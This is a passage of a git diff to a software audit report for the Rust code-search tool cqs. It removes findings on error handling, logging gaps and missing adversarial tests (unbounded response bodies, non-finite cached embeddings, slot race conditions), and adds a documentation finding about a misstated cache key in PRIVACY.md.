-- **Description:** When the daemon responds with a non-`ok` status (EH-13's "protocol error" branch), the function logs a warning, prints `cqs: daemon error: <msg>` and a hint to set `CQS_NO_DAEMON=1` — then returns `None`. The caller at `:200` interprets `None` uniformly as "fall back to CLI", so the CLI re-executes the *same* command moments later. The user sees the daemon error *and* the CLI's output for what should have been a single query. Two failure modes follow: (a) a daemon-only feature (e.g. a slot the daemon owns but the CLI re-resolves to a different active slot) returns a different result than the daemon would have, and the user has no way to tell which run their pipeline consumed; (b) write-side commands that the daemon refused for safety reasons get re-run from the CLI which may not have the same gating. The comment at line 459 — `"Still return None so we fall through to CLI path, but the user has been told why — no silent fallback"` — explicitly contradicts the EH-13 fix premise quoted at line 445-449 ("Falling back to CLI now would mask daemon bugs").
-- **Suggested fix:** Either (a) propagate the daemon error: change `try_daemon_query` to return `Result<Option<String>, anyhow::Error>` and bubble protocol errors up so dispatch exits non-zero with the daemon's message — matching the comment's intent; or (b) keep the fallthrough but wire a sticky `daemon_error_seen: bool` so the CLI path's output is prefixed with `WARN: daemon errored ("…"); falling back — results may differ` rather than silently producing a "second" result the user never asked for.
-
-#### `LocalProvider::fetch_batch_results` returns empty map on missing batch_id with no error — masks producer/consumer mismatch
-- **Difficulty:** easy
-- **Location:** `src/llm/local.rs:542-547`
-- **Description:**
-  ```rust
-  fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
-      let mut stash = self.stash.lock().unwrap();
-      Ok(stash.remove(batch_id).unwrap_or_default())
-  }
-  ```
-  The doc-comment says "returning empty if the id was already fetched or never existed". This collapses three distinct conditions — *id never existed*, *id was double-fetched*, *id existed but the worker pool dropped its results* (see prior finding) — into the same `Ok(HashMap::new())` reply. The summary/doc-gen loops at `src/llm/summary.rs` and `src/llm/doc_comments.rs` then commit zero rows for the affected batch and move on, with the only signal being a divergence between the `succeeded` count logged at submission and the row count actually persisted. There is no `tracing::warn!` on the missing-id path.
-- **Suggested fix:** Replace with explicit error variants: `match stash.remove(batch_id) { Some(m) => Ok(m), None => Err(LlmError::Internal(format!("local batch_id {batch_id} not found in stash — already fetched or submission silently lost results"))) }`. Add a `LlmError::BatchNotFound(String)` variant so callers can distinguish "double fetch" from a real provider error and either retry or surface the drift to the operator.
-
-#### Embedder model fingerprint silently falls back to `repo:timestamp` — invalidates entire embedding cache on hash failure
-- **Difficulty:** easy
-- **Location:** `src/embedder/mod.rs:435-466`
-- **Description:** When `model_fingerprint()` (the cache-key seed for the project-scoped embeddings cache, PR #1105) cannot stream-hash the ONNX file, three nested error arms fall back to `format!("{}:{}", self.model_config.repo, ts)`. `ts` is `SystemTime::now()` — **a different value every run**. The `EmbeddingCache` keys entries by `(content_hash, model_id)` where `model_id` is built from this fingerprint. Result: every time fingerprint hashing fails (transient I/O hiccup, AV scanner holding the file open on Windows, EBUSY), every chunk re-embeds against a brand-new model_id and the cache delivers 0% hit rate without surfacing a single signal to `cqs cache stats` or `cqs index`. Operators see "5 GB cache, growing every reindex" and the only diagnostic is the warn line buried in the journal. This also bloats the cache forever — old `repo:ts1` entries remain, never revisited, until `cqs cache prune --model 'repo:ts1'` (which the operator wouldn't know to run).
-- **Suggested fix:** Promote the hash failure to a hard error: change the fingerprint type to `Result<String, EmbedderError>` and propagate via `?`. The cost (no cache hit on a single bad reindex) is dramatically lower than the silent-storm cost. If a fallback is desired for legacy compatibility, hash a stable proxy (file path + file size + mtime — all syscalls that don't read content) instead of `now()`, so retries within the same `mtime` window reuse the same cache. Either way, surface a `cqs doctor` warning when the stored model_id has the `repo:<ts>` shape, since that's a signal of broken cache.
-
-#### Pattern: `serde_json::to_value(...).unwrap_or_else(|_| json!({}))` in impact/format.rs and 4 sibling sites silently turns serialization bugs into empty output
-- **Difficulty:** easy
-- **Location:** `src/impact/format.rs:11-16, 101-106`; `src/cli/commands/io/context.rs:94-97, 320-323, 498-501`; `src/cli/commands/io/blame.rs:240-243`
-- **Description:** Six call sites use the pattern:
-  ```rust
-  serde_json::to_value(&output).unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to serialize ...");
-      serde_json::json!({})
-  })
-  ```
-  The output value is the *entire* result of the command (impact graph, context bundle, blame data). On any `Serialize` impl bug — typically only triggered after a refactor adds a non-serializable field — the user receives `{}` as the JSON envelope payload. An agent piping `cqs impact foo --json | jq '.callers'` gets `null` and treats it as "no callers" rather than "serialization broke and you need to file a bug." Combined with `dispatch_diff` / `dispatch_impact` paths, an entire batch handler can return `{}` for every input and the agent never sees a real error. `serde_json::to_value` only fails on `Serialize` impl bugs (and a few overflow cases) — these are programmer errors, not runtime conditions, and silencing them violates the "no silent failure" principle codified in EH-V1.29-9.
-- **Suggested fix:** Switch all six to `serde_json::to_value(&output)?` and propagate. The function signatures (`impact_to_json`, `build_*_output`) currently return `Value`; bumping them to `Result<Value, serde_json::Error>` is a single-character touch at each callsite — they all already terminate in `crate::cli::json_envelope::emit_json(&obj)?` which already handles `Result`. Programmer errors should fail loud, not produce `{}` and a journal warn the operator never reads.
-
-#### `cache_cmd::cache_stats` silently treats `QueryCache::open` failure as "0 bytes" — operator can't tell empty cache from broken cache
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/cache_cmd.rs:120-139`
-- **Description:** New cache subcommand (PR #1105) reports the QueryCache file's size alongside the embedding cache. The lookup is wrapped in a `match QueryCache::open(...) { Ok(qc) => qc.size_bytes()..., Err(e) => { tracing::warn!(...); 0 }}`. When the QueryCache is locked by another process, has bad permissions, or hit a schema migration error, the JSON envelope reports `query_cache_size_bytes: 0` exactly as if the file was empty, and `cqs cache stats --json` consumers (the docs explicitly call this out as a P3 #124 fix) can't tell the difference. Same anti-pattern called out in EH-V1.29-7 (`EmbeddingCache::stats`) but on the new sibling code.
-- **Suggested fix:** Add a `query_cache_status: "ok" | "missing" | "error: <message>"` field to the JSON envelope and print a one-line `Query cache: <error>` next to the size on the text path. Don't reuse the success-shaped numeric field for failure.
-
-#### `slot_remove` masks `list_slots` failure as "the only slot remaining" — bails with confusing message instead of the real I/O error
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/slot.rs:303-313`
-- **Description:**
-  ```rust
-  let active = read_active_slot(...).unwrap_or_else(|| DEFAULT_SLOT.to_string());
-  let mut all = list_slots(project_cqs_dir).unwrap_or_default();    // <-- swallows StoreError
-  all.retain(|n| n != name);
-  if name == active {
-      if all.is_empty() {
-          anyhow::bail!("Refusing to remove the only remaining slot '{}'. Create another slot first.", name);
-      }
-      ...
-  }
-  ```
-  If `list_slots` fails (slots/ readdir fails, permission denied), `all` is `vec![]`, then `retain` does nothing, then the active-slot branch fires with "Refusing to remove the only remaining slot" — even though ten slots may exist on disk. Operator sees a contradiction with `cqs slot list` output and has no way to debug. Same pattern at `src/cli/commands/infra/slot.rs:273, 304, 313` and `src/cli/commands/infra/doctor.rs:923`.
-- **Suggested fix:** Propagate with `?` (the function already returns `Result<()>` via anyhow): `let mut all = list_slots(project_cqs_dir).context("Failed to list slots while validating remove")?;`. Same change for the three other sites — none of them are on a "best-effort" path where empty-on-error is semantically correct.
-
-#### `build_token_pack` swallows `get_caller_counts_batch` failure with no warnings field
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/io/context.rs:438-441`
-- **Description:**
-  ```rust
-  let caller_counts = store.get_caller_counts_batch(&names).unwrap_or_else(|e| {
-      tracing::warn!(error = %e, "Failed to fetch caller counts for token packing");
-      HashMap::new()
-  });
-  let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
-  ```
-  `pack_by_relevance` ranks chunks by caller count to pack the highest-value ones first into the token budget. With an empty `caller_counts` map, every chunk ties at "0 callers" and packing degrades to whatever stable-sort fallback kicks in — typically file-order. The agent receives a token-packed context that *looks* correct (right token count, right shape) but selected the *wrong* chunks. Sibling functions in the same file (`build_full_data`) carry a `warnings` field; this one is missed in the EH-V1.29-9 sweep. There is no signal — JSON or text — that ranking degraded.
-- **Suggested fix:** Either propagate (`build_token_pack` already returns `Result`), or thread a `warnings: &mut Vec<String>` parameter through, push `"caller_counts query failed: {e}; token-pack ranking degraded to file-order"`, and have the caller include it in the typed output struct. The propagation path is one keystroke (`?`) and is the right call here — packing without ranking signal is worse than failing the command.
-
-#### `read --focus` silently empties `type_chunks` on store batch failure — focused read returns chunk with no type definitions
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/io/read.rs:230-235`
-- **Description:** Same `unwrap_or_else(|e| { tracing::warn!(...); HashMap::new() })` pattern as the EH-V1.29-9 family but in `read --focus`. Output struct `FocusedReadOutput` does not currently carry a `warnings` field. An agent calling `cqs read --focus my_fn --json` to gather `my_fn` plus its type dependencies receives the function body alone with no signal that the type lookup failed — the agent then makes downstream decisions based on "no relevant type defs exist" when the truth was a transient store error.
-- **Suggested fix:** Mirror the `SummaryOutput::warnings` pattern from `cli/commands/io/context.rs:464`. Add `#[serde(skip_serializing_if = "Vec::is_empty")] warnings: Vec<String>` to the focused-read output and push `"search_by_names_batch failed: {e}; type definitions omitted"` on the warn arm. This finding parallels the existing pattern call-out (EH-9 in the prior batch1 file) but specifically for the `read --focus` command which was missed in the v1.29.x sweep.
-
-#### `serve::data::build_chunk_detail` collapses NULL `signature` and `content` columns to empty string — UI can't tell "missing chunk body" from "empty function"
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:488-492`
-- **Description:**
-  ```rust
-  let signature: String = row.get::<Option<String>, _>("signature").unwrap_or_default();
-  let doc: Option<String> = row.get("doc");
-  let content: String = row.get::<Option<String>, _>("content").unwrap_or_default();
-  ```
-  `doc` is correctly typed as `Option<String>` so the UI sees `null` vs `""`. `signature` and `content` get the same nullable column treatment in SQL but are coerced to `""` here. The UI's chunk-detail sidebar then shows a chunk with **no signature line and no body** — visually identical to an empty function. The `#[derive(Serialize)] ChunkDetail { signature: String, content: String }` typing makes this fix mechanical: change to `Option<String>` and handle `None` in the JS so the user can see "<missing — DB column NULL>" rather than a blank pane that looks like correct rendering of an empty struct. Real-world cause: a partial write during indexing (SIGKILL between INSERT phases) where the chunk row exists but content didn't make it.
-- **Suggested fix:** Change both fields on `ChunkDetail` to `Option<String>`, drop the `unwrap_or_default()`. Update `serve/assets/views/chunk-detail.js` to render `null` as a `<missing>` placeholder rather than the empty string. NULL in SQL is a real signal — flattening it loses the diagnostic.
-
-
-## Observability
-
-Coverage is broadly excellent in v1.30.0 — the v0.12.1 lesson has been applied across all post-v0.9.7 modules and v1.30.0 additions (`slot`, `cache`, `serve`, embedder/provider). Previously-flagged OB-V1.29-1 through OB-V1.29-7 are now fixed. Below are NEW observability gaps not in `audit-triage-v1.30.0.md`.
-
-#### OB-V1.30-1: Default subscriber drops EVERY `info_span!` event — no spans render at default log level
-- **Difficulty:** easy
-- **Location:** `src/main.rs:14-32`
-- **Description:** The default `EnvFilter` is `"warn,ort=error"`, but every span in the codebase (~150 sites) is `tracing::info_span!` (INFO) or `tracing::debug_span!`. Under default settings none of these match the filter, so the subscriber emits nothing for them. `fmt::init()` also never calls `.with_span_events(FmtSpan::CLOSE)` (or `NEW | CLOSE`), so even if INFO were enabled, span boundaries would not produce log lines on entry/exit — only events emitted *inside* the span would. Consequence: a user running `cqs index` with default config sees no per-batch progress, no SPLADE timing, no UMAP rows-projected count from spans alone — the heavy investment in span instrumentation across `scout`, `gather`, `serve`, `cache`, `slot`, parser, store, and embedder is invisible until someone discovers `--verbose` or `RUST_LOG=info`. There is no runtime way to trace one `cqs serve` request end-to-end without rebuilding the process. Operators of the daemon (`cqs watch --serve`) hit this hardest because the systemd unit inherits empty `RUST_LOG`.
-- **Suggested fix:** (a) Bump default to `"cqs=info,warn"` (cqs's own crate at INFO, world at WARN) so existing spans render without third-party noise. (b) Configure span events: `tracing_subscriber::fmt().with_span_events(tracing_subscriber::fmt::format::FmtSpan::CLOSE).with_env_filter(filter)…` so close events emit `latency_ms` automatically. (c) Add a `--log-format=json` flag (and `CQS_LOG_FORMAT=json`) wired to `.json()` on the fmt builder, so daemon journals are structurally consumable.
-
-#### OB-V1.30-2: `auth::enforce_auth` rejects 401 silently — no `tracing::warn!` on auth failure
-- **Difficulty:** easy
-- **Location:** `src/serve/auth.rs:194-232` (specifically `AuthOutcome::Unauthorized` branch at lines 224-230)
-- **Description:** The new per-launch token middleware (#1118, SEC-7) emits zero log output when a request fails authentication. A brute-force scan, expired bookmark, or misconfigured client gets a generic `401 Unauthorized` body and the operator has no journal trail showing it happened, the path attempted, or the source. Asymmetric with `enforce_host_allowlist` at `src/serve/mod.rs:246`, which DOES emit `tracing::warn!(host = %host, "serve: rejected request with disallowed Host header")`. Auth failures are the higher-value signal — host-allowlist failures are usually misconfiguration, while auth failures are the canonical "someone is probing" event.
-- **Suggested fix:** Inside the `AuthOutcome::Unauthorized` arm at `src/serve/auth.rs:224`, before returning the 401 response, emit:
-  ```rust
-  tracing::warn!(
-      method = %req.method(),
-      path = %req.uri().path(),
-      "serve: rejected unauthenticated request",
-  );
-  ```
-  Do NOT log token candidates — even truncated.
-
-#### OB-V1.30-3: Per-request span (TraceLayer) and `build_*` spans are disconnected because `tokio::task::spawn_blocking` doesn't propagate span context
-- **Difficulty:** medium
-- **Location:** `src/serve/handlers.rs:86, 111, 131, 160, 210, 236` (every `spawn_blocking` call)
-- **Description:** The serve router wires `TraceLayer::new_for_http()` (`src/serve/mod.rs:195`) which generates a per-request span (fixes OB-V1.29-5 at the request level). Each handler then spawns its blocking work via `tokio::task::spawn_blocking(move || super::data::build_graph(…))`. The closure runs on a fresh blocking-pool thread which has NO span stack inherited from the caller — `tokio` does not propagate `tracing::Span::current()` into spawn_blocking by default. Inside `build_graph`/`build_chunk_detail`/`build_hierarchy`/`build_cluster`/`build_stats`, the `info_span!` becomes a fresh root span. A JSON capture of one request shows two unrelated trees: TraceLayer's `http_request{method=GET path=/api/graph}` and a separately-rooted `build_graph{file_filter=…}`. Once OB-V1.30-1 is fixed and INFO spans render, the noise will be doubled with no parent linkage.
-- **Suggested fix:** Capture `tracing::Span::current()` before the spawn and `instrument` the closure:
-  ```rust
-  use tracing::Instrument;
-  let span = tracing::Span::current();
-  let stats = tokio::task::spawn_blocking({
-      let store = state.store.clone();
-      move || {
-          let _entered = span.enter();
-          super::data::build_stats(&store)
-      }
-  }).await…
-  ```
-  Apply at all six handlers (stats/graph/chunk_detail/search/hierarchy/cluster_2d). Alternative: drop the per-handler `tracing::info!` lines (80, 100, 126, 149, 175, 201, 231) and rely solely on the inner `build_*` span entry — they're redundant once the inner span emits CLOSE events.
-
-#### OB-V1.30-4: `cqs eval` runner uses `eprintln!` for progress instead of `tracing::info!`
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/eval/runner.rs:163-168`
-- **Description:** The eval runner emits progress (`[eval] 50/109 queries (12.3 q/s)`) via `eprintln!` at line 167. Every other progress signal in the codebase (`build.rs` SPLADE batches at 546, UMAP at `umap.rs:142`, daemon GC at `watch.rs:1217`) uses `tracing::info!` with structured fields. Using `eprintln!`: (a) prevents JSON-redirect of eval output for downstream comparison tooling, (b) fires unconditionally even with `RUST_LOG=error` (no quiet mode), (c) the q/s number can't be filtered or summed from journal logs.
-- **Suggested fix:** Replace line 167 with:
-  ```rust
-  tracing::info!(done, total = total_queries, qps, "eval progress");
-  ```
-  Keep `eprintln!` only behind a `--quiet=false` CLI gate if interactive feedback is required, or rely on the `cqs=info` default after OB-V1.30-1.
-
-#### OB-V1.30-5: `nl/mod.rs` public NL generators have zero spans — generated text shapes the embedding for every chunk
-- **Difficulty:** easy
-- **Location:** `src/nl/mod.rs:43, 65, 189, 209` (`generate_nl_with_call_context`, `generate_nl_with_call_context_and_summary`, `generate_nl_description`, `generate_nl_with_template`)
-- **Description:** None of the four `generate_nl_*` public functions have entry spans, despite being the canonical text-shaping path that determines what every chunk's embedding sees. When eval drops 5pp recall after a model swap, there is no way to bisect from "which NL template rendered which chunk" — an operator has to add spans by hand and rebuild. (The fts/markdown helpers running in tight indexing loops are reasonable to skip; the 4 NL generators are NOT inner-loop, they run once per chunk during enrichment.)
-- **Suggested fix:** Add a single `tracing::debug_span!("generate_nl", template = ?template, chunk_kind = ?chunk.chunk_type, len = chunk.content.len())` at the top of `generate_nl_with_template` (line 209). The other three call into it transitively, so one span covers all four entry points. `debug_span!` (not info) keeps it off by default.
-
-#### OB-V1.30-6: `embed_documents` / `embed_query` lack completion fields — entry span has `count`/`text` but no result.len, dim, time
-- **Difficulty:** easy
-- **Location:** `src/embedder/mod.rs:683, 722`
-- **Description:** Both entry spans are minimal: `info_span!("embed_documents", count = texts.len())` and `info_span!("embed_query")`. There is no "embed_documents complete" event with the produced batch size, embedding dim, or tokenization stats. `FmtSpan::CLOSE` (OB-V1.30-1) would partially fix this, but even with CLOSE events the only structured field would be the entry-time `count`, not output sizes / dim / tokenization stats. Indexing 100k chunks today produces ~200 `embed_batch` enter events and zero "I produced N embeddings of dim D in T ms" events.
-- **Suggested fix:** At the bottom of `embed_documents` (after the loop completes), add:
-  ```rust
-  tracing::info!(
-      total = embeddings.len(),
-      dim = self.embedding_dim(),
-      input_count = texts.len(),
-      "embed_documents complete"
-  );
-  ```
-  Same pattern in `embed_query` at `tracing::debug!` level.
-
-#### OB-V1.30-7: `Reranker::rerank_with_passages` swallows `passages.len() != results.len()` mismatch with no log — silent semantic corruption
-- **Difficulty:** easy
-- **Location:** `src/reranker.rs:200-220`
-- **Description:** `rerank_with_passages` accepts `passages: &[&str]` independent of `results: &mut Vec<SearchResult>`. The doc says "passages must have the same length as results" but the implementation does not assert, log, or take a tracing event when the lengths diverge. If a caller mis-zips (e.g. filters results post-fetch but forgets to re-trim passages), `compute_scores` either panics on out-of-bounds slicing or scores arbitrarily-paired text, and the operator sees nothing in the journal. Semantically silent: ranks shift, neither error nor warning fires.
-- **Suggested fix:** At line 213 (after the entry span, before the early-return), add:
-  ```rust
-  if passages.len() != results.len() {
-      tracing::warn!(
-          passages = passages.len(),
-          results = results.len(),
-          "rerank_with_passages: length mismatch — caller bug, results will be corrupted",
-      );
-      return Err(RerankerError::InvalidArguments(format!(
-          "passages.len()={} != results.len()={}",
-          passages.len(),
-          results.len()
-      )));
-  }
-  ```
-  Add the `InvalidArguments` variant if it doesn't exist; warn-only also acceptable but less safe.
-
-#### OB-V1.30-8: `train_data` git subprocess wrappers don't log non-zero exit codes — silent failure on shallow clones / missing SHAs
-- **Difficulty:** easy
-- **Location:** `src/train_data/git.rs:65-242` (`git_log`, `git_diff_tree`, `git_show`)
-- **Description:** Each function has an entry `tracing::info_span!` (good), but on `output.status.success()` failure the exit code and stderr are bundled into a `TrainDataError` and returned — no structured log. When `cqs train-data --max-commits 1000` walks a shallow repo and 50% of `git_diff_tree` calls fail with `fatal: bad revision`, the user sees a single aggregated count at the end and has no way to reconstruct WHICH SHAs failed without re-running with `RUST_LOG=trace`. The `is_shallow` probe at line 241 is the only one that handles a missing-SHA case gracefully.
-- **Suggested fix:** In each subprocess wrapper, on `!output.status.success()` add before the error return:
-  ```rust
-  tracing::warn!(
-      sha,
-      exit = output.status.code(),
-      stderr = %String::from_utf8_lossy(&output.stderr).trim(),
-      "git_diff_tree failed",
-  );
-  ```
-  Apply consistently to `git_log` (line 65), `git_diff_tree` (line 131), `git_show` (line 173).
-
-#### OB-V1.30-9: Format-string-interpolated `tracing::info!` calls — structural fields are lost
-- **Difficulty:** easy
-- **Location:** `src/hnsw/build.rs:78, 236`; `src/hnsw/persist.rs:210, 638, 771`; `src/reference.rs:220`; `src/cli/commands/train/export_model.rs:76`; `src/audit.rs:85, 93`; `src/embedder/provider.rs:149`
-- **Description:** OB-V1.29-4 specifically called out `verify_hnsw_checksums` for this pattern; the audit fixed that one site but the broader pattern persists across HNSW build/persist and several other modules. Lines like `tracing::info!("Building HNSW index with {} vectors", nb_elem)` produce a single rendered string instead of structured `count = nb_elem` fields. Once OB-V1.30-1 lands JSON formatting, these lines remain un-queryable: jq-extracting the vector count from "Building HNSW index with 178432 vectors" needs a regex per line, while `count: 178432` is a JSON field. Friction with no offsetting benefit — `tracing` natively supports both forms.
-- **Suggested fix:** Convert each site to structured form. Examples:
-  ```rust
-  // src/hnsw/build.rs:78
-  tracing::info!(count = nb_elem, "Building HNSW index");
-  // src/hnsw/persist.rs:210
-  tracing::info!(dir = %dir.display(), basename, "Saving HNSW index");
-  ```
-  Sweep the 9 sites in one pass. Pure-mechanical change, no behavior delta.
-
-#### OB-V1.30-10: `cqs serve` cluster_2d emits no warn when corpus has chunks but zero UMAP rows — operators see only the empty payload
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:901, 1020` (`build_cluster`); handler at `src/serve/handlers.rs:227-242`
-- **Description:** When the user runs `cqs serve` against a corpus indexed without `cqs index --umap` (the v1.30.0 schema-v22 default — UMAP is opt-in), the cluster-3d view returns `{nodes: [], skipped: N}` with N = total chunks. The frontend renders a "run cqs index --umap" hint (per the doc comment at handlers.rs:226), but the backend emits no `tracing::warn!` to surface this state in the journal — the operator who runs `cqs serve` over SSH and gets a blank cluster view has no log to point at. Neighboring `build_hierarchy` at `data.rs:638` DOES log `tracing::info!(root_id, "build_hierarchy: root chunk not found")` for its empty-result case.
-- **Suggested fix:** At the point inside `build_cluster` where `coords` is empty but `total_chunks > 0`, add:
-  ```rust
-  if response.nodes.is_empty() && response.skipped > 0 {
-      tracing::warn!(
-          skipped = response.skipped,
-          "build_cluster: corpus has chunks but no UMAP coordinates — run `cqs index --umap`",
-      );
-  }
-  ```
+Audit mode: ON. Scope: README, CONTRIBUTING, SECURITY, PRIVACY, CHANGELOG, ROADMAP, doc comments. Triage state checked against `docs/audit-triage-v1.30.0.md` (no v1.30.1 triage file yet).
 
 ---
 
-## Triage notes
+## Documentation
 
-- **OB-V1.30-1** is the highest-leverage finding — fixing it unlocks the value of every span already in the codebase. P1 by impact, easy by effort.
-- **OB-V1.30-2** is the only one tied directly to the new auth surface (#1118); SEC-7 shipped without the warn-on-reject side, so the security event is silent.
-- **OB-V1.30-3** is the only "medium" — it requires understanding tokio's blocking-pool span propagation. The other nine are all easy.
-- **OB-V1.30-9** is bundled because the prior audit (OB-V1.29-4) only patched one site of an idiomatic-but-stale pattern that persists across ~9 lines.
-- I did NOT report module-wide gaps in `scout`, `where_to_add`, `gather`, `staleness`, `impact`, or `slot`/`cache`/`serve` — every public function in those modules now has an entry span, confirming the v0.12.1 lesson has been applied. The current observability bar in cqs is high; the remaining gaps are at the rendering / correlation / completeness edges, not the "no spans exist" tier.
-
-
-## Test Coverage (adversarial)
-
-Audit scope: v1.30.0. Skipped findings already triaged in `docs/audit-triage-v1.30.0.md` (the v1.29.0 carryover triage). Focus is on surfaces *added or substantially changed* in v1.29.1..v1.30.0 — slots/cache (#1105), local LLM provider (#1101), per-launch serve auth (#1118), non-blocking HNSW rebuild (#1113), `nomic-coderank` preset (#1110), execution-provider feature split (#1120) — plus pre-existing untested adversarial paths.
-
-#### TC-ADV-1.30-1: `LocalProvider` body-size DoS — `body_preview` and `parse_choices_content` both buffer entire HTTP response before truncating
-- **Difficulty:** medium
-- **Location:** `src/llm/local.rs:474-488` (`parse_choices_content`), `src/llm/local.rs:490-500` (`body_preview`). Tests in `src/llm/local.rs:595+`.
-- **Description:** `parse_choices_content` calls `resp.json::<Value>()` which reads the entire response body into memory before parsing. `body_preview` calls `resp.text()` which does the same, then char-truncates to 256 bytes. The `reqwest::blocking::Client` constructed at `src/llm/local.rs:97-100` sets `timeout` and `redirect` only — there is **no body-size limit**. A misconfigured / hostile / panicked OpenAI-compat server (or any server reachable at the configured `api_base`) can return an arbitrarily large 200-OK or 4xx body and OOM the daemon's blocking-pool thread. The local LLM concurrency knob clamps at 64, so up to 64 concurrent unbounded reads can race for memory before any one completes. Existing test `long_response_not_truncated` at `:826-847` only exercises the 100 KB happy path and *requires* the full body to come through — locking in the unbounded read as a contract.
-- **Suggested fix:** Add to the `tests` module in `src/llm/local.rs`:
-  - `test_oversized_response_body_capped_at_5mb` — mock a 200-OK with a 50 MB JSON body; assert the worker either errors out (preferred) or reads at most a documented cap (e.g. 5 MB). Implementation: wrap the response with `Response::bytes_stream` / `take` or set `reqwest::Client::builder().…response_body_limit(…)` (helper exists via `read_to_end_with_limit`).
-  - `test_4xx_with_large_body_does_not_buffer_entire_body` — mock a 400 with a 50 MB body; assert `body_preview` returns ≤ 256 bytes *and* never allocates more than e.g. 4 KB by checking with a tracking allocator or measuring `resp.bytes_stream().next().await`.
-  - Recommended alongside: cap response body via `reqwest::Body::limit` or `Response::bytes_stream` chunking. Without a fix, an A6000 box's 64-thread blocking pool × N-MB body = trivial OOM crater.
-
-#### TC-ADV-1.30-2: `EmbeddingCache::write_batch` and `QueryCache::put` accept NaN/Inf embeddings — cross-process cache poisoning
+#### PRIVACY/SECURITY misstate the embedding-cache primary key (drops `purpose` column)
 - **Difficulty:** easy
-- **Location:** `src/cache.rs:332-407` (`EmbeddingCache::write_batch`), `src/cache.rs:1677-1699` (`QueryCache::put`). Tests in the `tests` mod (`src/cache.rs:756+`) and `shared_runtime_tests` (`:1748+`).
-- **Description:** `write_batch` validates `embedding.len() == dim` and `!embedding.is_empty()` (lines 360-373) but never checks `embedding.iter().all(|f| f.is_finite())`. Same hole in `QueryCache::put` (line 1677): bytes are flat-mapped from `embedding.as_slice()` and inserted with no finiteness check. Once a poisoned NaN/Inf entry lands on disk, *every subsequent process* that reuses the project's `embeddings_cache.db` (now project-scoped per #1105 — so cross-slot too) reads it back via `read_batch` (line 282-296) which also does not gate on finiteness, and the corrupt floats flow into HNSW search (which has a `is_finite` guard at `src/hnsw/search.rs:82`) and the brute-force / reranker scoring paths (which mostly do not). #1105 made this *worse* by making the cache long-lived per-project (was per-build before): a single bad embedder run permanently poisons the cache until the user runs `cqs cache prune`.
-  - Triage note: TC-ADV-1.29-1 / TC-ADV-1.29-2 (P3) called this out at the embedder boundary; this is the *cache* boundary, which is independent and currently the only line of defense if a future embedder swap (Phase B/C of #956 — CoreML/ROCm) happens to ship NaN-on-overflow behavior different from CUDA today.
-- **Suggested fix:** In `src/cache.rs::tests`:
-  - `test_write_batch_rejects_nan_embedding` — write `vec![1.0, f32::NAN, 0.5, …]`; assert it is either dropped with a `tracing::warn!` or returned as a 0-count, and that a subsequent `read_batch` returns no row for that hash.
-  - `test_write_batch_rejects_inf_embedding` — same for `f32::INFINITY` / `f32::NEG_INFINITY`.
-  - `test_query_cache_put_rejects_non_finite` — sibling test in `query_cache_tests` (or a new mod). Build an `Embedding` via `Embedding::new` (the unchecked path; `try_new` already rejects), `put` it, then `get` it and assert the embedding either does not appear or comes back as a documented sentinel.
-  - Implementation should sit alongside the existing `embedding.len() != dim` warn/skip blocks: one extra `if embedding.iter().any(|f| !f.is_finite())` early-skip with a `tracing::warn!` carrying the hash prefix.
+- **Location:** `PRIVACY.md:16`, plus the v1.30.0 CHANGELOG entry at `CHANGELOG.md:71` and ROADMAP at `ROADMAP.md:131`
+- **Description:** PRIVACY.md line 16 says the project cache is `keyed by (content_hash, model_id)`. The actual schema in `src/cache.rs:277` is `PRIMARY KEY (content_hash, model_fingerprint, purpose)` — `purpose` was added in #1128 to discriminate embedding-vs-summary lookups. The doc-claimed two-column key would imply summary-pass embeddings could be served to non-summary callers, which is exactly the bug #1128 fixed. This is a privacy-relevant lie because PRIVACY.md is what users read to understand what gets stored — telling them about a 2-tuple when the system stores a 3-tuple obscures that summary-pass content fingerprints are persisted as a separate row class. SECURITY.md line 47 likewise says "summary is cached by `content_hash`" with no mention of `model_fingerprint` / `purpose`.
+- **Suggested fix:** PRIVACY.md:16 → "keyed by `(content_hash, model_fingerprint, purpose)` (#1105, #1128). Skips re-embedding chunks that haven't changed across reindexes / model swaps; the `purpose` discriminator (`embedding` vs `summary`) prevents cross-pass collisions." Apply the same column update to SECURITY.md:47 and to the historical CHANGELOG / ROADMAP entries (or add a note that the schema gained `purpose` post-#1105).
+- **Existing issue:** none
 
-#### TC-ADV-1.30-3: `slot_create` / `slot_remove` TOCTOU — concurrent slot operations corrupt `.cqs/slots/<name>/`
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/slot.rs:219-266` (`slot_create`), `:299-350` (`slot_remove`). Tests at `:391-516` cover sequential happy paths only.
-- **Description:** Two scenarios with no test today:
-  1. **Concurrent `cqs slot create foo`**: line 224 checks `dir.exists()`, line 233 calls `fs::create_dir_all(&dir)` (idempotent — does not fail). Both processes proceed past the existence check, both write `slot.toml` via `write_slot_model`. The second writer wins via the temp+rename atomicity inside `write_slot_model`, but both processes report success and the user has no signal that one was a no-op.
-  2. **`cqs slot remove foo` racing `cqs index --slot foo`**: `slot_remove` calls `fs::remove_dir_all(&dir)` (line 335) without any lock. The indexer holds an open SQLite connection on `slot/foo/index.db`; on Linux the unlinking of in-use files is silent (Windows would error). The indexer continues writing to phantom inodes and, on next open, sees an empty slot. Worse: the auto-promotion at line 331 (`write_active_slot(…, &all[0])`) can flip the active pointer mid-index, so `cqs search` after the remove starts hitting an unrelated slot.
-  3. **`cqs slot remove`** while daemon is serving from that slot: daemon's read-only `Store` keeps the file alive on Linux but the on-disk directory is gone — the daemon's HNSW save path (any `set_hnsw_dirty` write) silently writes to a deleted-but-open inode. After daemon restart the slot is gone.
-- **Suggested fix:** Add to `src/cli/commands/infra/slot.rs::tests`:
-  - `test_slot_create_concurrent_same_name` — spawn 2 threads racing `slot_create(…, "foo", Some("bge-large"), …)`, then `slot_create(…, "foo", Some("e5-base"), …)`; assert at most one returns `Ok` *or* the slot ends up with a deterministic model (whichever contract is chosen).
-  - `test_slot_remove_during_open_index_db` — open `index.db` via `Store::open_readonly_pooled`, then call `slot_remove` from another thread; assert the open store either keeps working OR the remove returns an error (currently neither is guaranteed).
